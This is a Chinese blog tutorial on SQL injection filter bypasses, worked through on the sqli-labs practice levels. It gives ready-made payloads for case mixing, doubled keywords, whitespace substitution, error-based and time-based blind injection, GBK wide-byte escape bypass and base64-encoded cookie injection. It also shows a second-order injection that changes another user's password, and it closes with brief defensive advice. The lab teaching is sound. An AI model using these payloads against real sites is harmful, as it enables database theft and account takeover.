漏洞篇(SQL注入三)

已于 2023-03-29 22:40:42 修改
阅读量357 收藏 1
点赞数
分类专栏: 安全 文章标签: sql web安全
于 2023-03-29 22:37:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58001548/article/details/129825494
版权

目录

一、SQL 注入的绕过技术

1、大小写绕过

2、注释绕过

3、双写绕过

4、关键字等价绕过

5、绕过去除空格

6、绕过去除关键字的绕过

7、Mysql 宽字符绕过

8、base64 编码绕过      

二、二次注入修改其他用户密码

三、如何防御 SQL 注入

一、SQL 注入的绕过技术

1、大小写绕过

如果过滤器通过关键字进行过滤并没有识别大小写 ,我们就可以使用大小写来进行绕过,因为 SQL 语句是不区分大小写的。
        
原始语句
SELECT * FROM users WHERE id='1' LIMIT 0,1
        
大小写掺杂注入
SELECT * FROM users WHERE id='1' And 1=1--+' LIMIT 0,1
问题存在的原因是:过滤器过滤了正常的关键字,但是并没有对字符串进行处理。
        
        

2、注释绕过

Less-23

[root@localhost ~]# vim /var/www/html/sqli-labs/Less-23/index.php

我们可以看到 Less-23 中源代码过滤了单行注释的方法,我们可以正常闭合 SQL 语句来进行绕过。
程序代码中的 preg_replace(查找并替换)解释:
$id = preg_replace($reg, $replace, $id)
        
#$id = 表示重新赋值,preg_replace()查找和替换的函数,$reg 表示 reg 变量中的值为查找内容(值为:#),$replace 表示 replace 变量中的值为替换内容(该值为空),$id 表示查找并替换的目标。
即是对用户传递 id 的值中的内容,查找# 并替换为空,而后再重新赋值回 id,从而达到过滤效果
通过以上程序中代码可看到被过滤的有 # 和 -- ,因此不能够使用注释进行注入,下面绕过注释进
行注入。
        
例 1:
http://192.168.1.103/sqli-labs/Less-23/?id=-1' union select 1,database(),'3 

        

我们在第三个字段前添加一个单引号来闭合 id 字段后面的单引号,我们前面用到了一种类似的方
法。
语句分析:
语句中的 -1' union select 1,database(), '3 ,其中的 -1' 单引号用于闭合原语句中的前面单引
号, '3 是用于闭合原语句中后面的单引号
原来语句:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
注入后的语句:
SELECT * FROM users WHERE id=' -1' union select 1,database(),'3 ' LIMIT 0,1
由此可以拼接成一条完整可执行的语句。
        
        
例 2:使用逻辑运算注入
http://192.168.1.103/sqli-labs/Less-23/?id=-1' union select 1,database(),3 and '1'='1
        

使用 and 或者 or 添加一个表达式 or '1' = '1 注意后面一定要缺省一个单引号。否则 SQL 语句不能正常闭合。

        

3、双写绕过

前面我们介绍了 PHP 过滤函数可以过滤注释符,同样它也可以过滤关键字。
Less-25
        

代码中过滤了 or 和 AND,大小写同样都被过滤了
        
例 1:双写搭配大小写绕过
        
http://192.168.1.103/sqli-labs/Less-25/?id=-1' union select 1,database(),3 AandNd '1'='1
        

         

4、关键字等价绕过

Less-25
        
例 1:
http://192.168.1.103/sqli-labs/Less-25/?id=1 && id=2--
        
        
我们可以看到这条语句 id=1 后面并没有单引号,原因是使用&&进行连接时不需要进行闭合,流程
为 id=1 然后继续执行 id=2 最后--+单行注释
因为 id=1 && id=2 都是在同一个 URL 中指定,首先 id=1,这个时候 id 的变量中的值为 1。此
时,数据还没带到数据库里查询,因为还有 && id=2,然后 id 再重新传递一次,这个时候 id 的变量中 的值就变成了 2,然后传参结束,所以最终的值是 2,再到数据库里执行,结果是 id=2 的记录。
        
例 2:
http://192.168.1.103/sqli-labs/Less-25/?id=-1' || id=2--+
         
这里 id=-1'使 SQL 语句报错并使用单引号进行闭合,然后拼接 || 执行 id=2 最终--+单行注释
|| 前面 SQL 语句执行失败才会执行后面语句,这一点和 union 是一样的,需要我们手动将前面代码 进行报错。
        

5、绕过去除空格

Less-26
        
可替代空格使用的符号:
%20 %09 %0a %0b %0c %0d %a0 /**/                 #ascii 码转 url 编码
        
例:当前案例测试只有%a0 可以替换成功。
        
http://192.168.1.106/sqli-labs/Less-
26/?id=0%27%a0union%a0select%a01,database(),3%a0%26%26%a0%271%27=%271
        

相当于:
http://192.168.1.63/sqli-labs/Less-26/?id=0' union select 1,database(),3 && '1'='1
说明:
%a0                 #表示空格,MySQL 中%a0 代表空白符,可以代替空格
%26                 #表示&
%27                 #表示 ' 单引号
        
        

6、绕过去除关键字的绕过

Less-27
源码中过滤了常用注释和 union、select
        

 不过我们可以看到代码中的过滤并不完善,我们可以利用前面学过的多种方式进行绕过。

        
例 1:大小写绕过

http://192.168.1.103/sqli-labs/Less-27/?id=1' 
and%a0updatexml(1,concat(0x7e,(sElEct%a0database()),0x7e),1) and '1'='1

 例 2:盲注绕过

http://192.168.1.103/sqli-labs/Less-27/?id=1' 
and%a0if((length(database())=8),sleep(3),null)and '1'='1

        

7、Mysql 宽字符绕过

原理:
GBK 占用两字节
ASCII 占用一字节
PHP 中编码为 GBK,函数执行添加的是 ASCII 编码,MYSQL 默认字符集是 GBK 等宽字节字符
集。
Mysql 在使用 GBK 编码时,会认为两个字符为一个汉字。宽字节注入就是发生在 PHP 向 Mysql
请求时字符集使用了 GBK 编码。
                  
我们可以看到经过 addslashes()函数过滤后我们输入的字符会被转义,我们只输入的是一个\,结果反馈出来的是\\,由此证明,我们输入的\被转义了
        
http://192.168.1.103/sqli-labs/Less-33/?id=-1%df' union select 1,database(),user()--+
        

         

这是因为 id 的参数传入代码层,就会在 ' 前加一个\,由于采用的 URL 编码,所以产生的效果
是:%df%5c%27,关键就在这里,在 GBK 编码中,两个字符表示一个汉字,所以%df 把%5c 吃掉形 成了一个汉字,后面就剩一个单引号,所以此时的单引号并没有被转义了,可以发挥效果。
宽字符注入的必要条件,第一个字符的 ASCII 码必须大于 128。具体的参照 ASCII 表。
        
        

8、base64 编码绕过      

URL 编码是一种用途广泛的技术,可以通过 URL 编码来绕过多种类型的过滤器,通常会将存在问题 的字符自转换成十六进制 ASCII 码来进行替换,并且将 0x 替换为%。
        
例:单引号的的 ASCII 码为 0x27 替换为 URL 编码为%27
        
Less-22
        
源码:
$cookee = base64_decode($cookee);
PHP 代码使用 base64_decode();函数来进行解码
回到代理截断请求,可以看到 Cookie
        
   
        
复制编码后的字符,并把截获的请求发送到 Repeater(按 Ctrl+r)
        

 

通过以上实验可看到闭合方式是双引号 "  

admin" and updatexml(1,concat(0x7e,database(),0x7e),1) or "1"="1
复制编码后的字符,点击 Repeater 进行注入:
        
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2
UpLDEpIG9yICIxIj0iMQ==
        

         

二、二次注入修改其他用户密码

Less-24
新建用户 admin'-- +
注:--空格是注释,但是空格在提交参数是会被自动忽略掉,所以我们在空格后面加个字符避免空格 被忽略导致二次注入时注释失效。
        

         

分析源代码还原 SQL 语句
        
[root@xuegod63 ~]# vim /var/www/html/sqli-labs/Less-24/pass_change.php
第 38 行
        
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and
password='$curr_pass' ";
        
我们将用户信息带入
UPDATE users SET PASSWORD='xuegod' where username=' admin' -- +' and
password='123456'
        
最终执行
UPDATE users SET PASSWORD='xuegod' where username=' admin';
        
总结:二次注入构建了一个能够被重复利用的 payload。
        

三、如何防御 SQL 注入

我们前面举例了大量的 SQL 注入攻击的案例和技巧,都是因为程序要接收用户输入的变量或者 URL传递的参数,并且参数或变量会被组成 SQL 语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:外部数据不可信任。所以我们需要通过各种方式对数据进行检测和过滤。
1. 检查变量数据类型和格式
2. 过滤特殊符号
3. 绑定变量,使用预编译语句。#MySQL 的 mysqli 驱动提供了预编译语句的支持
whhc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全SQL注入漏洞的修复建议
Yb528970805的博客
09-25 1809
修复SQL注入漏洞需要仔细过滤危险字符和使用参数化查询或预编译语句。这两种方法可以有效地保护您的应用程序免受SQL注入攻击的威胁。在编写代码时,请始终考虑安全性,以确保您的应用程序和用户的数据都得到充分的保护。如果你也需要学网络安全,成为一名白帽黑客,可以看这份2023年最详细最全面的教程资料合集内容【戳下文链接即可学习】自学网络安全(黑客)技术多长时间能达到就业的水平?t=N7T8自学网络安全(黑客)技术多长时间能达到就业的水平?
sql注入详解
m0_67392811的博客
06-12 5808
目录前言? ?一、漏洞原因分析二、漏洞危害sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
常见安全漏洞及其解决方案
A_991128a的博客
06-17 6229
执行时,此后的文本将被忽略。但这并不是无代价的,受到损失最大的就是被控制的网站,往往随着暗链所指向的网站的权重不断提高,存在暗链的网站的权重将不断下降,搜索引擎排名也必然一再下降,严重影响网站的影响力。漏洞危害:该漏洞是通过版本号探测的,可能存在误报Apache HTTP Server是一款开源的流行的HTTPD服务程序.当处理包含大量Ranges头的HTTP请求时,ByteRange过滤器存在一个错误,攻击者可以向服务器发送特制HTTP请求,消耗大量内存,造成应用程序崩溃CVE-2011-3192。
防止SQL注入攻击的10种有效方法
热门推荐
qq_28245087的博客
06-29 3万+
本文介绍了10种防止SQL注入攻击的方法,包括使用参数化查询、输入验证和过滤、存储过程、最小权限原则、ORM框架、准备语句、安全的数据库连接、避免动态拼接SQL语句、使用防火墙和入侵检测系统以及定期更新和维护数据库软件。输入验证和过滤是一种用于确保用户输入数据的安全性和有效性的技术。需要注意的是,具体的代码实现可能因使用的数据库驱动库而有所不同,但核心思想是相同的:使用PreparedStatement来执行参数化查询,将用户输入作为参数传递给查询,而不是直接拼接到查询字符串中,以提高应用程序的安全性。
SQL 注入漏洞原理以及修复方法_sql注入漏洞
最新发布
2401_84969310的博客
05-13 919
注:把magic_quotes_gpc选项打开,在这种情况下所有的客户端GET和POST的数据都会自动进行addslashes处理,所以此时对字符串值的SQL注入是不可行的,但要防止对数字值的SQL注入,如用intval()等函数进行处理。(2)Admin’ - -(或‘ or 1=1 or ‘ - -)(admin or 1=1 --) (MS SQL)(直接输入用户名,不进行密码验证)(3)用户名输入:admin 密码输入:’ or ‘1’=’1 也可以。
SQL注入漏洞解决心得
Chumy_CC的博客
07-14 3640
SQL注入有哪些危害? 1、攻击者未经授权可访问数据库中的数据,盗取用户信息,造成用户数据泄露。 2、对数据库进行增删改查操作,导致权限模糊或丢失 3、可植入木马,篡改数据等
SQL注入问题及解决方法
chegy218的博客
04-01 8716
  SQL注入是一个安全问题,因为应用程序使用拼接SQL的技术而成为hacker攻击后台的方式。下面就介绍一下3种SQL注入,及解决SQL注入的方法。 下面以登录的机制为例,进行SQL注入的讲解。 1,基于 1=1 总为真 SELECT * FROM Users WHERE UserId = 105 OR 1=1; 黑客只需在输入字段中插入105或1=1,就可以访问数据库中的所有用户名和...
SQL注入漏洞全接触.ppt
11-15
SQL注入漏洞的类型 * 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
主要介绍了php中sql注入漏洞示例,大家在开发中一定要注意
Web安全常见漏洞原理、危害及其修复建议
wangluoanquan111的博客
06-19 1287
(当文件上传时,如果服务端的脚本语言没有对上传的文件进行检查和过滤,那假如,渗透者直接上传恶意代码文件,那么就有可能直接控制整个网站,或者说以此为跳板,直接拿下服务器,这就是文件上传漏洞。②csrf攻击之所以能成功,是因为攻击者伪造用户的请求,所以抵御csrf的关键在于:在请求中放入攻击者不能伪造的请求,例如,可以在HTTP请求中加入一个随机产生的token,并在服务器端验证token,如果请求中没有token或者token内容不正确,则认为请求可能是csrf攻击,从而拒绝该请求。
jsql-injection
05-27
多平台渗透测试工具,需要Java环境支持,跟sqlmap功能类似,但是有图形界面
jsql-injection:jSQL Injection是用于自动SQL数据库注入的Java应用程序
02-02
描述 jSQL Injection是一个轻量级应用程序,用于从远程服务器查找数据库信息。 它是免费的,开源的和跨平台的,适用于Windows,Linux和Mac OS X(带有Java,版本8至15)。 jSQL Injection也是官方渗透测试发行版一部分,并包含在其他各种发行版中,例如 , , 和 。 产品特点 自动注入33种数据库:Access,Altibase,C-treeACE,CockroachDB,CUBRID,DB2,Derby,Exasol,Firebird,FrontBase,H2,Hana,HSQLDB,Informix,Ingres,InterSystems-IRIS,MaxDB,Mckoi,MemSQL, MimerSQL,MonetDB,MySQL,Neo4j,Netezza,NuoDB,Oracle,PostgreSQL,Presto,SQLite,SQL Server,Sybase,Teradata和Vertica 多种注入策略:正常,错误,堆叠,盲注和时间 各种注入过程:默认,Zip,Dios 用于SQL和篡改脚本的沙箱 列出以注入
最新SQL注入漏洞修复建议
MachineGunJoe666
10-27 364
多数CMS都采用过滤危险字符的方式,例如,用正则表达式匹配union、sleep、load_file等关键字。如果匹配到,则退出程序。使用PDO预编译语句时需要注意的是,不要将变量直接拼接到PDO语句中,而是使用占位符进行数据库中数据的增加、删除、修改、查询。示例代码如下:​​​​​​​。使用过滤的方式,可以在一定程度上防止出现SQL注入漏洞,但仍然存在被绕过的可能。常用的SQL注入漏洞的修复方法有两种。
php网站sql注入修复方案,php 网站sql注入漏洞解决方案
weixin_35632257的博客
03-17 556
分享到:------解决方案--------------------你直接看下修复方案。------解决方案--------------------Fatal error: Call to undefined method NodeNav::GetCounter() in E:\www\ECMS\Template_c\[emailprotected][emailprotected]@list_...
SQL注入-报错注入
qq_65240014的博客
08-08 770
本文主要介绍一种结合burpsuite的报错注入的sql注入方法
SQL中# 与$ 的区别
weixin_30647065的博客
06-01 659
区别: (1)#将传入的数据都当成一个字符串,会对自动传入的数据加一个双引号。如:order by #user_id#,如果传入的值是id,则解析成的sql为order by "id"。 (2)$将传入的数据直接显示生成在sql中。如:order by $user_id$,如果传入的值是id,则解析成的sql为order by id。 (3)#方式在很大程度上能够防止sql注入。 ...
修复SQL注入漏洞 两种方法
cuanli7032的博客
03-16 2399
之前在网上找到一个在线的网站漏洞扫描工具,叫亿思平台,是一个免费的web安全扫描平台。反正免费,就测试自己的一个网站,没想到还真扫描出SQL注入漏洞。但里面没有提供自动修复功能,需要自己动手来修复。经过反复查看论坛资料,还真让我...
(SQL)注入漏洞修复
qq_31763129的博客
05-09 6909
一、 /include/filter.inc.php文件,搜索(大概在46行的样子)      return $svar;      修改为      return addslashes($svar);      二、/member/mtypes.php文件,搜索(大概在71行的样子)      $query = "UPDATE `dede_mtypes` SET mtypename='$name...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值